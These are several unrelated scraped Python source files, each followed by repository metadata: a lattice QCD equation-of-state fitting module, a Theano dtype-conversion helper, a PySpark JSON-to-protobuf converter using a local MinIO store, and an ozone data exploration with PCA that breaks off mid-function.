    dgq = 2.*Nc # degeneracy factor for quarks
    dgg = 2.*(Nc**2.-1.) # degeneracy factor for gluons
    # if input is a single temperature value T
    if(isinstance(T,float)):
        # chemical potential asssociated to each quark
        mu_u = 1./3.*muB + 2./3.*muQ
        mu_d = 1./3.*muB - 1./3.*muQ
        mu_s = 1./3.*muB - 1./3.*muQ - muS
        # list of partons corresponding to the given number of flavors
        # chemical potentials and charges
        # NOTE(review): an Nf outside {0, 2, 3} leaves these lists undefined
        # and raises a NameError below — confirm intended input domain
        if(Nf==0):
            list_mu = []
            list_B = []
            list_Q = []
            list_S =[]
        elif(Nf==2):
            list_mu = [mu_u,mu_d]
            list_B = [1./3.,1./3.]
            list_Q = [2./3.,-1./3.]
            list_S =[0.,0.]
        elif(Nf==3):
            list_mu = [mu_u,mu_d,mu_s]
            list_B = [1./3.,1./3.,1./3.]
            list_Q = [2./3.,-1./3.,-1./3.]
            list_S = [0.,0.,-1.]
        # pressure P/T^4: gluon term plus one term per quark flavor
        Pgluons = (pi**2)/90.*dgg
        Pquarks = dgq*sum([(7*pi**2)/360. + ((mu_q/T)**2)/12. + ((mu_q/T)**4)/(24*pi**2) for mu_q in list_mu])
        P = Pgluons+Pquarks
        # entropy density s/T^3
        sgluons = 4*(pi**2)/90.*dgg
        squarks = dgq*sum([(4*7*pi**2)/360. + 2*((mu_q/T)**2)/12. for mu_q in list_mu])
        s = sgluons+squarks
        # conserved-charge densities n/T^3, weighted by the quark quantum numbers
        nB = dgq*sum([B_q*((2*(mu_q/T))/12. + (4*(mu_q/T)**3)/(24*pi**2)) for B_q,mu_q in zip(list_B,list_mu)])
        nQ = dgq*sum([Q_q*((2*(mu_q/T))/12. + (4*(mu_q/T)**3)/(24*pi**2)) for Q_q,mu_q in zip(list_Q,list_mu)])
        nS = dgq*sum([S_q*((2*(mu_q/T))/12. + (4*(mu_q/T)**3)/(24*pi**2)) for S_q,mu_q in zip(list_S,list_mu)])
        # energy density e/T^4 from the Euler relation e = Ts - P + sum(mu*n)
        e = s-P+muB/T*nB+muQ/T*nQ+muS/T*nS
        # conformal speed of sound squared
        cs2 = 1./3.
    # if the input is a list of temperature values
    elif(isinstance(T,np.ndarray) or isinstance(T,list)):
        P = np.zeros_like(T)
        s = np.zeros_like(T)
        nB = np.zeros_like(T)
        nQ = np.zeros_like(T)
        nS = np.zeros_like(T)
        e = np.zeros_like(T)
        cs2 = 1./3.*np.ones_like(T)
        for i,xT in enumerate(T):
            # see if arrays are also given for chemical potentials
            try:
                xmuB = muB[i]
            except:
                xmuB = muB
            try:
                xmuQ = muQ[i]
            except:
                xmuQ = muQ
            try:
                xmuS = muS[i]
            except:
                xmuS = muS
            # evaluate the scalar branch element-wise
            result = SB_lim(xT,xmuB,xmuQ,xmuS,Nf=Nf)
            P[i] = result['P']
            s[i] = result['s']
            nB[i] = result['n_B']
            nQ[i] = result['n_Q']
            nS[i] = result['n_S']
            e[i] = result['e']
    else:
        raise Exception('Problem with input')
    return {'P':P,'s':s,'n_B':nB,'n_Q':nQ,'n_S':nS,'e':e,'I':e-3.*P,'cs^2':cs2}
###############################################################################
# import data for the parametrization of susceptibilities
###############################################################################
# Load the rational-fit coefficients (numerator a_i, denominator b_i) for every
# susceptibility, for both the <n_S>=0 tables and the unconstrained tables.
# Result: chi_a / chi_b map a susceptibility name -> list of coefficients.
chi_a = {}
for chi_file in ["/data/chi_a_nS0.csv","/data/chi_a.csv"]:
    param_chi_a = pd.read_csv(dir_path+chi_file).to_dict(orient='list')
    # scan rows for each chi
    for i,chi in enumerate(param_chi_a['chi']):
        values = []
        # scan columns with coefficients
        for j,coeff in enumerate(param_chi_a):
            # skip first column which is chi string
            if(coeff=='chi'):
                continue
            # append values
            values.append(param_chi_a[coeff][i])
        chi_a.update({chi:values})
chi_b = {}
for chi_file in ["/data/chi_b_nS0.csv","/data/chi_b.csv"]:
    param_chi_b = pd.read_csv(dir_path+chi_file).to_dict(orient='list')
    # scan rows for each chi
    for i,chi in enumerate(param_chi_b['chi']):
        values = []
        # scan columns with coefficients
        for j,coeff in enumerate(param_chi_b):
            # skip first column which is chi string
            if(coeff=='chi'):
                continue
            # append values
            values.append(param_chi_b[coeff][i])
        chi_b.update({chi:values})
# list of all susceptibilities
# NOTE: param_chi_b/param_chi_a here hold the LAST file read (the
# unconstrained table), so list_chi covers the unconstrained names only
list_chi = list(param_chi_a['chi'])
list_chi_nS0 = ['chiB2_nS0','chiB4_nS0']
########################################################################
# Stefan Boltzmann limit for the susceptibilities
# can be found in PhysRevC.100.064910
# (high-T asymptotic value each parametrized chi must approach)
chi_SB = dict(zip(list_chi,[19.*pi**2./36.,\
    1./3.,2./3.,1.,\
    0.,-1./3.,1./3.,\
    2./(9.*pi**2.),4./(3*pi**2.),6./pi**2.,\
    0.,-2./(9.*pi**2.),2./(9.*pi**2.),\
    4./(9.*pi**2.),-2./pi**2.,2./pi**2.,\
    4./(9.*pi**2.),2./(3.*pi**2.),2./(3.*pi**2.),\
    2./(9.*pi**2.),-2./(9.*pi**2.),-2./(3.*pi**2.)]))
# SB values for the strangeness-neutral expansion coefficients c_2, c_4
chi_SB.update(dict(zip(list_chi_nS0,[0.1067856506125367,0.0006673764465596013])))
########################################################################
def param_chi(T,quant):
    """
    Parametrized lQCD susceptibility named by ``quant`` (e.g. 'chiBQS121')
    as a ratio of polynomials in 1/t with t = T/Tc(0); T in GeV, float or
    numpy array. A constant offset pins the high-T Stefan-Boltzmann limit.
    """
    t = T/Tc_lattice(0.)
    num = sum([coef/(t)**power for power,coef in enumerate(chi_a[quant])])
    den = sum([coef/(t)**power for power,coef in enumerate(chi_b[quant])])
    offset = chi_SB[quant]-chi_a[quant][0]/chi_b[quant][0]
    return num/den + offset
########################################################################
# for each susceptibility, get the order of the derivative wrt B,Q,S
########################################################################
# For every susceptibility name, record the order of the derivative taken
# wrt each conserved charge (B, Q, S), and build a LaTeX label for plots.
BQS = dict(zip(list_chi,[{'B': 0, 'Q': 0, 'S': 0} for i in range(len(list_chi))]))
chi_latex = {'chi0':r'$\chi_0$'}
for chi in list_chi:
    # derivatives wrt to each charge
    if(chi!='chi0'):
        # decompose chiBQS234 in [B,Q,S] and [2,3,4]
        chi_match = re.match('chi([A-Z]+)([0-9]+)', chi)
        list_charge = list(chi_match.group(1)) # contains the charges
        list_der = list(chi_match.group(2)) # contains the derivatives
        chi_latex.update({chi:r'$\chi^{'+"".join(list_charge)+'}_{'+"".join(list_der)+'}$'})
        for ich,xcharge in enumerate(list_charge):
            BQS[chi][xcharge] = int(list_der[ich]) # match each charge to its derivative
# labels for the strangeness-neutral expansion coefficients
chi_latex.update({'chiB2_nS0':r'$c_2$', 'chiB4_nS0':r'$c_4$'})
########################################################################
def param(T,muB,muQ,muS):
    """
    lQCD parametrization of the thermodynamics as a Taylor expansion in the
    chemical potentials (coefficients from param_chi).

    Parameters
    ----------
    T : float or numpy array / list of floats
        temperature in GeV
    muB, muQ, muS : float (or arrays matching T)
        chemical potentials in GeV

    Returns
    -------
    dict: 'T', 'P'=P/T^4, 's'=s/T^3, 'n_B','n_Q','n_S'=n/T^3, 'e'=e/T^4,
    'I'=(e-3P)/T^4
    """
    # if input is a single temperature value T
    if(isinstance(T,float)):
        p = 0.
        nB = 0.
        nQ = 0.
        nS = 0.
        s = 0.
        e = 0.
        if(muB==0. and muQ==0. and muS==0.):
            # at vanishing chemical potentials only chi0 contributes
            p = param_chi(T,'chi0')
            der = scipy.misc.derivative(param_chi,T,dx=1e-5,args=('chi0',))
            s = T*der
        else:
            for chi in list_chi:
                # orders of the derivative wrt muB, muQ, muS
                i = BQS[chi]['B']
                j = BQS[chi]['Q']
                k = BQS[chi]['S']
                # Taylor factor 1/(i! j! k!)
                fact = 1./(factorial(i)*factorial(j)*factorial(k))
                xchi = param_chi(T,chi)
                pow_muB = ((muB/T)**i)
                pow_muQ = ((muQ/T)**j)
                pow_muS = ((muS/T)**k)
                # pressure P/T^4
                p += fact*xchi*pow_muB*pow_muQ*pow_muS
                # baryon density n_B/T^3 when i > 1
                if(i >= 1):
                    nB += fact*xchi*i*((muB/T)**(i-1.))*pow_muQ*pow_muS
                # charge density n_Q/T^3 when i > 1
                if(j >= 1):
                    nQ += fact*xchi*pow_muB*j*((muQ/T)**(j-1.))*pow_muS
                # strangeness density n_S/T^3 when k > 1
                if(k >= 1):
                    nS += fact*xchi*pow_muB*pow_muQ*k*((muS/T)**(k-1.))
                # derivative of the susceptibility wrt temperature
                der = scipy.misc.derivative(param_chi,T,dx=1e-5,args=(chi,))
                # s/T^3 = T d(P/T^4)/d(T) + 4 P/T^4
                # here we add just the 1st part
                s += fact*(T*der-(i+j+k)*xchi)*pow_muB*pow_muQ*pow_muS
            # add 2nd piece to s/T^3
            s += 4.*p
        # energy density e/T^4
        e = s-p+(muB/T)*nB+(muQ/T)*nQ+(muS/T)*nS
    # if the input is a list of temperature values
    elif(isinstance(T,np.ndarray) or isinstance(T,list)):
        p = np.zeros_like(T)
        s = np.zeros_like(T)
        nB = np.zeros_like(T)
        nQ = np.zeros_like(T)
        nS = np.zeros_like(T)
        e = np.zeros_like(T)
        for i,xT in enumerate(T):
            # see if arrays are also given for chemical potentials
            try:
                xmuB = muB[i]
            except:
                xmuB = muB
            try:
                xmuQ = muQ[i]
            except:
                xmuQ = muQ
            try:
                xmuS = muS[i]
            except:
                xmuS = muS
            # evaluate the scalar branch element-wise
            result = param(xT,xmuB,xmuQ,xmuS)
            p[i] = result['P']
            s[i] = result['s']
            nB[i] = result['n_B']
            nQ[i] = result['n_Q']
            nS[i] = result['n_S']
            e[i] = result['e']
    else:
        raise Exception('Problem with input')
    return {'T': T,'P':p, 's':s, 'n_B':nB, 'n_Q':nQ, 'n_S':nS, 'e':e, 'I':e-3*p}
########################################################################
def param_nS0(T,muB):
    """
    lQCD parametrization along the strangeness-neutral line
    <n_S> = 0 with <n_Q> = 0.4 <n_B>, using the dedicated expansion
    coefficients c_2, c_4 (list_chi_nS0).

    Parameters
    ----------
    T : float or numpy array / list of floats
        temperature in GeV
    muB : float (or array matching T)
        baryon chemical potential in GeV

    Returns
    -------
    dict: same keys as param(); note n_S stays 0 and n_Q = 0.4 n_B
    by construction in the scalar branch.
    """
    # if input is a single temperature value T
    if(isinstance(T,float)):
        p = 0.
        nB = 0.
        nQ = 0.
        nS = 0.
        s = 0.
        e = 0.
        # muB-independent part from chi0
        p = param_chi(T,'chi0')
        der = scipy.misc.derivative(param_chi,T,dx=1e-5,args=('chi0',))
        s = T*der
        if(muB!=0.):
            for ichi,chi in enumerate(list_chi_nS0):
                # expansion order: chiB2_nS0 -> 2, chiB4_nS0 -> 4
                i = 2*(ichi+1)
                xchi = param_chi(T,chi)
                pow_muB = ((muB/T)**i)
                # pressure P/T^4
                p += xchi*pow_muB
                # baryon density n_B/T^3 when i > 1
                nB += xchi*i*((muB/T)**(i-1.))
                # derivative of the susceptibility wrt temperature
                der = scipy.misc.derivative(param_chi,T,dx=1e-5,args=(chi,))
                # s/T^3 = T d(P/T^4)/d(T) + 4 P/T^4
                # here we add just the 1st part
                s += (T*der-(i)*xchi)*pow_muB
        # add 2nd piece to s/T^3
        s += 4.*p
        # energy density e/T^4
        e = s-p+(muB/T)*nB
        # charge density
        nQ = 0.4*nB
    # if the input is a list of temperature values
    elif(isinstance(T,np.ndarray) or isinstance(T,list)):
        p = np.zeros_like(T)
        s = np.zeros_like(T)
        nB = np.zeros_like(T)
        nQ = np.zeros_like(T)
        nS = np.zeros_like(T)
        e = np.zeros_like(T)
        for i,xT in enumerate(T):
            # see if arrays are also given for chemical potentials
            try:
                xmuB = muB[i]
            except:
                xmuB = muB
            # evaluate the scalar branch element-wise
            result = param_nS0(xT,xmuB)
            p[i] = result['P']
            s[i] = result['s']
            nB[i] = result['n_B']
            nQ[i] = result['n_Q']
            nS[i] = result['n_S']
            e[i] = result['e']
    else:
        raise Exception('Problem with input')
    return {'T': T,'P':p, 's':s, 'n_B':nB, 'n_Q':nQ, 'n_S':nS, 'e':e, 'I':e-3*p}
###############################################################################
# import data from lattice at muB = 0
###############################################################################
# read chi0
# read chi0 (P/T^4 at muB = 0) from the Wuppertal-Budapest EoS table;
# each chi_lattice* dict maps a chi name -> array of (T, value, error) rows
WB_EoS0 = pd.read_csv(dir_path+"/data/WB-EoS_muB0_j.physletb.2014.01.007.csv").to_dict(orient='list')
chi_lattice2014 = {'chi0':np.array(list(zip(WB_EoS0['T'],WB_EoS0['P'],WB_EoS0['P_err'])))}
# save all other thermodynamic quantities
for quant in WB_EoS0:
    WB_EoS0[quant] = np.array(WB_EoS0[quant])
# read data from 2012 (chiB2,chiQ2,chiS2)
chi_lattice2012 = {}
try:
    df = pd.read_csv(dir_path+"/data/WB_chi_T_JHEP01(2012)138.csv").to_dict(orient='list')
    for entry in df:
        # skip the temperature column and the error columns themselves
        if(entry=='T' or '_err' in entry):
            continue
        chi_lattice2012.update({entry:np.array(list(zip(df['T'],df[entry],df[entry+'_err'])))})
except:
    # data file is optional; silently skip when missing/unreadable
    pass
# read data from 2015 (chiB2,chiB4,chiS2)
chi_lattice2015 = {}
try:
    df = pd.read_csv(dir_path+"/data/WB_chi_T_PhysRevD.92.114505.csv").to_dict(orient='list')
    for entry in df:
        if(entry=='T' or '_err' in entry):
            continue
        # drop NaN rows so each array only holds measured points
        chi_lattice2015.update({entry:np.array([[df['T'][iT],df[entry][iT],df[entry+'_err'][iT]] for iT,_ in enumerate(df[entry]) if np.logical_not(np.isnan(df[entry][iT]))])})
except:
    pass
# read data from 2017 (chiB2,chiB4,chiB2) for <nS>=0 & <nQ>=0.4<nB>
chi_lattice2017 = {}
try:
    df = pd.read_csv(dir_path+"/data/WB_chi_nS0_T_EPJWebConf.137(2017)07008.csv").to_dict(orient='list')
    for entry in df:
        if(entry=='T' or '_err' in entry):
            continue
        chi_lattice2017.update({entry:np.array([[df['T'][iT],df[entry][iT],df[entry+'_err'][iT]] for iT,_ in enumerate(df[entry]) if np.logical_not(np.isnan(df[entry][iT]))])})
except:
    pass
# read data from 2018
chi_lattice2018 = {}
try:
    df = pd.read_csv(dir_path+"/data/WB_chi_T_JHEP10(2018)205.csv").to_dict(orient='list')
    for entry in df:
        if(entry=='T' or '_err' in entry):
            continue
        chi_lattice2018.update({entry:np.array(list(zip(df['T'],df[entry],df[entry+'_err'])))})
except:
    pass
# read data from 2020 (chiBQ11,chiBS11,chiQS11)
chi_lattice2020 = {}
try:
    df = pd.read_csv(dir_path+"/data/WB_chi_T_PhysRevD.101.034506.csv").to_dict(orient='list')
    for entry in df:
        if(entry=='T' or '_err' in entry):
            continue
        chi_lattice2020.update({entry:np.array(list(zip(df['T'],df[entry],df[entry+'_err'])))})
except:
    pass
# read data from 2021
WB_EoS_muBoT2021 = {}
try:
    df = pd.read_csv(dir_path+"/data/WB-EoS_muBoT_2102.06660.csv").to_dict(orient='list')
    for entry in df:
        if(entry=='T' or '_err' in entry):
            continue
        WB_EoS_muBoT2021.update({entry:np.array(list(zip(df['T'],df[entry],df[entry+'_err'])))})
except:
    pass
###############################################################################
def EoS_nS0(fun,T,muB,**kwargs):
    """
    Evaluate the EoS given by ``fun`` at (T, muB) under the heavy-ion
    conditions <n_S> = 0 and <n_Q> = 0.4 <n_B>, solving for the muQ and muS
    that realize them.

    Parameters
    ----------
    fun : callable
        any EoS function with signature fun(T, muB, muQ, muS, **kwargs)
        returning a dict with at least 'P','s','n_B','n_Q','n_S','e'
        (e.g. param, HRG, full_EoS)
    T, muB : float or numpy array / list of floats
        temperature and baryon chemical potential in GeV

    Returns
    -------
    dict with the thermodynamic quantities plus the solved 'muQ' and 'muS';
    'n' and 'chi' are only populated when ``fun`` provides them (HRG case).
    """
    # target ratio <n_Q>/<n_B>
    factQB = 0.4
    if(isinstance(T,float)):
        p = 0.
        nB = 0.
        nQ = 0.
        nS = 0.
        s = 0.
        e = 0.
        n = 0.
        chi = np.zeros(len(list_chi))
        def system(mu):
            """
            Define the system to be solved
            <n_S> = 0
            <n_Q> = factQB * <n_B>
            """
            thermo = fun(T,muB,mu[0],mu[1],**kwargs)
            # multiply by T^3 to work with unscaled densities
            return [thermo['n_S']*T**3, thermo['n_Q']*T**3-factQB*thermo['n_B']*T**3]
        # initial guess (muQ, muS) proportional to muB; LM handles the flat case
        solution = scipy.optimize.root(system,[-0.08*muB,0.03*muB],method='lm').x
        muQ = solution[0]
        muS = solution[1]
        # re-evaluate the EoS at the solved chemical potentials
        result = fun(T,muB,muQ,muS,**kwargs)
        p = result['P']
        s = result['s']
        nB = result['n_B']
        nQ = factQB*nB
        nS = 0.
        e = result['e']
        # some extra quantities are calculated within HRG function
        try:
            n = result['n']
            chi = result['chi']
        except:
            pass
    elif(isinstance(T,np.ndarray) or isinstance(T,list)):
        p = np.zeros_like(T)
        s = np.zeros_like(T)
        nB = np.zeros_like(T)
        nQ = np.zeros_like(T)
        nS = np.zeros_like(T)
        n = np.zeros_like(T)
        e = np.zeros_like(T)
        muQ = np.zeros_like(T)
        muS = np.zeros_like(T)
        chi = np.zeros((len(list_chi),len(T)))
        for i,xT in enumerate(T):
            # see if arrays are also given for chemical potentials
            try:
                xmuB = muB[i]
            except:
                xmuB = muB
            # solve the constraints at each temperature point
            result = EoS_nS0(fun,xT,xmuB,**kwargs)
            p[i] = result['P']
            s[i] = result['s']
            nB[i] = result['n_B']
            nQ[i] = result['n_Q']
            nS[i] = result['n_S']
            n[i] = result['n']
            e[i] = result['e']
            muQ[i] = result['muQ']
            muS[i] = result['muS']
            chi[:,i] = result['chi']
    else:
        raise Exception('Problem with input')
    return {'T':T, 'muQ': muQ, 'muS': muS, 'P':p, 's':s, 'n_B':nB, 'n_Q':nQ, 'n_S':nS, 'n':n, 'e':e, 'chi':chi, 'I':e-3*p}
| pierre-moreau/EoS_HRG | EoS_HRG/fit_lattice.py | fit_lattice.py | py | 20,400 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "os.path.realpath",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser... |
42493659115 | """
Helper function to safely convert an array to a new data type.
"""
from __future__ import absolute_import, print_function, division
import numpy as np
import theano
__docformat__ = "restructuredtext en"
def _asarray(a, dtype, order=None):
"""Convert the input to a Numpy array.
This function is almost identical to ``numpy.asarray``, but it should be
used instead of its numpy counterpart when a data type is provided in
order to perform type conversion if required.
The reason is that ``numpy.asarray`` may not actually update the array's
data type to the user-provided type. For more information see ticket
http://projects.scipy.org/numpy/ticket/870.
In that case, we check that both dtype have the same string
description (byte order, basic type, and number of bytes), and
return a view with the desired dtype.
This function's name starts with a '_' to indicate that it is meant to be
used internally. It is imported so as to be available directly through
theano._asarray
"""
if str(dtype) == 'floatX':
dtype = theano.config.floatX
dtype = np.dtype(dtype) # Convert into dtype object.
rval = np.asarray(a, dtype=dtype, order=order)
# Note that dtype comparison must be done by comparing their `num`
# attribute. One cannot assume that two identical data types are pointers
# towards the same object (e.g. under Windows this appears not to be the
# case).
if rval.dtype.num != dtype.num:
# Type mismatch between the data type we asked for, and the one
# returned by numpy.asarray.
# If both types have the same string description (byte order, basic
# type, and number of bytes), then it is safe to return a view.
if (dtype.str == rval.dtype.str):
# Silent fix.
return rval.view(dtype=dtype)
else:
# Unexpected mismatch: better know what is going on!
raise TypeError(
'numpy.array did not return the data type we '
'asked for (%s %s #%s), instead it returned type '
'%s %s #%s: function '
'theano._asarray may need to be modified to handle this '
'data type.' %
(dtype, dtype.str, dtype.num, rval.dtype, rval.str,
rval.dtype.num))
else:
return rval
| Theano/Theano | theano/misc/safe_asarray.py | safe_asarray.py | py | 2,384 | python | en | code | 9,807 | github-code | 36 | [
{
"api_name": "theano.config",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "numpy.dtype",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 34,
"usage_type": "call"
}
] |
24814387482 | #! /usr/bin/env python
from __future__ import print_function
from pyspark import SparkContext, SparkConf
from pyspark.sql import SparkSession
import Addressbook_pb2
import sys
from google.protobuf import json_format
import json
import glob
import errno
# Pipeline: read newline-delimited JSON from MinIO (S3) via Spark, rewrite it
# locally, merge the part files into one dict, and serialize it as a protobuf
# AddressBook to the path given as the first command-line argument.
if __name__ == "__main__":
    # Spark/Hadoop S3A configuration pointing at a local MinIO endpoint
    # NOTE(review): credentials are hard-coded — move to env/config for real use
    confz = SparkConf()\
        .set("spark.hadoop.fs.s3a.endpoint","http://127.0.0.1:9000")\
        .set("spark.hadoop.fs.s3a.access.key","minio")\
        .set("spark.hadoop.fs.s3a.secret.key","minio123")\
        .set("spark.hadoop.fs.s3a.path.style.access","true")\
        .set("spark.hadoop.fs.s3a.impl","org.apache.hadoop.fs.s3a.S3AFileSystem")
    spark = SparkSession.builder.master("local[3]").appName("Test4").config(conf=confz).getOrCreate()
    # load the JSON dataset from S3 and re-save it as local JSON part files
    ndf = spark.read.option("multiline","false").format("json").load("s3a://spark-test/jsontest")
    ndf.write.mode("overwrite").format("json").save("/home/yy/fod/jsonfile")
    address_book = Addressbook_pb2.AddressBook()
    json_dict = {}
    # merge every JSON part file written by Spark into a single dict
    files = glob.glob("/home/yy/fod/jsonfile/*.json")
    for name in files:
        try:
            with open(name) as f:
                json_dict.update(json.load(f))
        except IOError as exc:
            # ignore directory entries; re-raise any other I/O failure
            if exc.errno != errno.EISDIR:
                raise
    # build the protobuf message from the merged JSON dict
    address_book = json_format.ParseDict(json_dict, Addressbook_pb2.AddressBook())
    # serialize to the output path supplied on the command line
    with open(sys.argv[1], "wb") as f:
        f.write(address_book.SerializeToString())
| yiyuan906/ProjectWork | ProtobufTest/SparkConvertFrom.py | SparkConvertFrom.py | py | 1,367 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pyspark.SparkConf",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder.master",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder",
"line_number": 22,
"usage_type": "attribute"... |
41510394343 | # -*- coding: utf-8 -*-
# project 1
import pandas as pd
import numpy as np
import matplotlib
import warnings
import matplotlib.pyplot as plt
import os
import seaborn as sns
from scipy import stats as st
from scipy.linalg import svd
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from sklearn.decomposition import PCA
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from scipy.stats import norm
warnings.filterwarnings("ignore", category=matplotlib.MatplotlibDeprecationWarning)
### inspect data ###
# finding NaN or no values
# looking for duplicates
def inspect_data(data):
    """
    Print basic data-quality checks (missing values, duplicated rows) and
    write a table of per-column summary statistics to 'data_measures.txt'
    in the current working directory. Expects a numeric pandas DataFrame.
    """
    # data-quality checks
    print("Is there missing Data?: ", data.isnull().sum().sum())
    print("Is there duplicated data?:", data.duplicated().sum())
    # per-column summary statistics (both population and sample std/var)
    stat_names = ("mean", "std", "var", "min", "25%-percentile", "median",
                  "75%-percentile", "max", "std (N-1)", "var (N-1)", "mode")
    stat_df = pd.DataFrame(columns=data.columns, index=stat_names)
    for column in data.columns:
        values = data[column]
        summary = {
            "mean": round(np.mean(values), 2),
            "median": round(np.median(values), 2),
            "min": round(np.min(values), 2),
            "max": round(np.max(values), 2),
            "std": round(np.std(values), 2),
            "std (N-1)": round(np.std(values, ddof=1), 2),
            "var": round(np.var(values), 2),
            "var (N-1)": round(np.var(values, ddof=1), 2),
            "mode": st.mode(values),
            "25%-percentile": round(np.quantile(values, 0.25), 2),
            "75%-percentile": round(np.quantile(values, 0.75), 2),
        }
        for stat_name, stat_value in summary.items():
            stat_df[column][stat_name] = stat_value
    # persist the summary table as plain text
    with open(os.path.join(os.getcwd(), "data_measures.txt"), 'w') as f:
        f.write(stat_df.to_string())
# Data Visualisation
def data_visualisation(data):
    """
    Draw the exploratory plots for the ozone data set: standardized
    boxplots, per-feature histograms, pandas and hand-computed correlation
    heat maps, temperature scatter plots and per-season projections.

    Every figure is displayed with plt.show(); nothing is returned.
    Expects a numeric DataFrame with at least columns 'temp', 'ibh',
    'ibt', 'vis' and an integer 'season' column in {0, 1, 2, 3}.
    """
    ### boxplots of all (standardized) features ###
    plt.figure(figsize=(10, 8))
    plt.boxplot((data - data.mean()) / data.std(ddof=1) , labels=data.columns)
    plt.title("Boxplots of all Features")
    plt.xlabel("Features")
    plt.ylabel("Data values")
    plt.xticks(rotation=90)
    plt.show()
    ### histograms for every feature except the categorical season ###
    plt.figure(figsize=(15, 12))
    sns.set_style("whitegrid")
    for i, column in enumerate(data.columns.drop("season"), 1):
        plt.subplot(3, 4, i)
        sns.histplot(data[column], kde=True)
        plt.title(f'Distribution of {column}')
    plt.tight_layout()
    plt.show()
    ### pandas correlation heat map ###
    plt.figure(figsize=(10,8))
    sns.heatmap(data.corr(), cmap="RdBu")
    plt.xticks(rotation=90)
    plt.yticks(rotation=0)
    plt.title("Correlation Heat Map")
    plt.tight_layout()  # BUGFIX: was `plt.tight_layout` (attribute access, no-op)
    plt.show()
    print(data.corr())
    # empirical covariance -> empirical correlation, computed by hand
    cov_mat = np.cov(data, rowvar=False, ddof=1)
    print(cov_mat)
    cor_mat = np.zeros((data.shape[1],data.shape[1]))
    for i in range(data.shape[1]):
        for j in range(data.shape[1]):
            cor_mat[i][j] = cov_mat[i][j]/(np.std(data.iloc[:,i],ddof=1)*np.std(data.iloc[:,j],ddof=1))
    fig, ax = plt.subplots(figsize=(10,8))
    sns.heatmap(cor_mat, cmap="RdBu")
    plt.xticks(rotation=90)
    ax.set_xticklabels(data.columns)
    ax.set_yticklabels(data.columns)
    plt.yticks(rotation=0)
    plt.title("Empirical Correlation Heat Map")
    plt.tight_layout()  # BUGFIX: was a no-op attribute access here as well
    plt.show()
    ### temperature vs inversion base height / temperature ###
    fig, ax = plt.subplots(1, 2, figsize=(14, 6))
    ax[0].scatter(data["temp"], data["ibh"], color='blue', label='temp vs ibh')
    ax[0].set_title('Temperature vs IBH')
    ax[0].set_xlabel('Temperature')
    ax[0].set_ylabel('IBH')
    ax[1].scatter(data["temp"], data["ibt"], color='red', label='temp vs ibt')
    ax[1].set_title('Temperature vs IBT')
    ax[1].set_xlabel('Temperature')
    ax[1].set_ylabel('IBT')
    plt.show()
    ### 1-D strip of temperatures colored by season ###
    plt.figure(figsize=(10, 6))
    colors = ['green', "red", "blue", "orange"]
    plt.axhline(y=1, color='grey', linestyle='--', lw=0.5)
    for i, row in data.iterrows():
        plt.scatter(row['temp'], 1, color=colors[data["season"][i]])
    plt.title("Temperature with Season Symbols")
    plt.xlabel("Temperature (°C)")
    plt.yticks([])  # hide y-ticks: this is effectively a 1-D plot
    plt.legend()  # NOTE(review): no labeled artists here, so no legend is drawn
    plt.grid(True, which='both', linestyle='--', linewidth=0.5, axis='x')
    plt.tight_layout()
    plt.show()
    ### temperature vs visibility, one color per season ###
    for c in range(4):
        # select indices belonging to class c:
        class_mask = data["season"] == c
        plt.plot(data["temp"][class_mask], data["vis"][class_mask], 'o', alpha=.3)
    plt.legend(["winter", "spring", "summer", "fall"])
    plt.show()
def pca(data):
    """
    Principal component analysis of the ozone features ('doy' and 'season'
    dropped): standardize, run an SVD, plot explained variance, 2-D
    projections colored by season, a scatter matrix of the leading
    components, and the per-feature component loadings.
    """
    ### standardize the feature matrix (zero mean, unit sample std) ###
    data_pca = data.drop(["doy", "season"], axis=1)
    mean = data_pca.mean()
    std = data_pca.std(ddof=1)
    data_pca_scaled = np.asarray((data_pca - mean) / std)
    ### PCA via singular value decomposition ###
    U, S, V = svd(data_pca_scaled, full_matrices=False)
    # Compute variance explained by principal components
    rho = (S * S) / (S * S).sum()
    # cumulative-variance threshold line shown in the plot
    threshold = 0.9
    ### plot explained variance ###
    plt.figure()
    plt.plot(range(1, len(rho) + 1), rho, 'x-', color='red')
    plt.plot(range(1, len(rho) + 1), np.cumsum(rho), 'o-', color='blue')
    plt.plot([1,len(rho)],[threshold, threshold],'k--')
    plt.title('Variance explained by principal components');
    plt.xlabel('Principal component');
    plt.ylabel('Variance explained');
    plt.legend(['Individual', 'Cumulative', 'Threshold'])
    plt.grid()
    plt.show()
    ### transform data onto pca components ###
    # rows of V are components; V.T holds the loading vectors as columns
    V_real = V.T
    Z = data_pca_scaled @ V_real
    ### Plot PCA projection ###
    # pca component indices (pairs of components to plot against each other)
    pca_idx = [[0, 1], [1, 4]]
    for idx in pca_idx:
        plt.figure()
        plt.title('Los Angeles Ozone: PCA')
        # Z = array(Z)
        for c in range(len(sorted(set(data["season"])))):
            # select indices belonging to class c:
            class_mask = data["season"] == c
            plt.plot(Z[class_mask, idx[0]], Z[class_mask, idx[1]], 'o', alpha=.5)
        plt.legend(["winter", "spring", "summer", "fall"])
        plt.xlabel('PC{0}'.format(idx[0] + 1))
        plt.ylabel('PC{0}'.format(idx[1] + 1))
        plt.show()
    ### further analysis of most important pca components ###
    # number of pca components to be analysed further
    max_pca = 5
    # plot matrix scatter pca plot for max_pca components
    fig, ax = plt.subplots(max_pca, max_pca, figsize=(20, 10))
    plt.suptitle(f'Los Angeles Ozone: PCA for {max_pca} components')
    for i in range(max_pca):
        for j in range(max_pca):
            for c in range(len(sorted(set(data["season"])))):
                # select indices belonging to class c:
                class_mask = data["season"] == c
                ax[i][j].plot(Z[class_mask, i], Z[class_mask, j], 'o', alpha=.5)
            ax[i][j].set_xlabel('PC{0}'.format(i + 1))
            ax[i][j].set_ylabel('PC{0}'.format(j + 1))
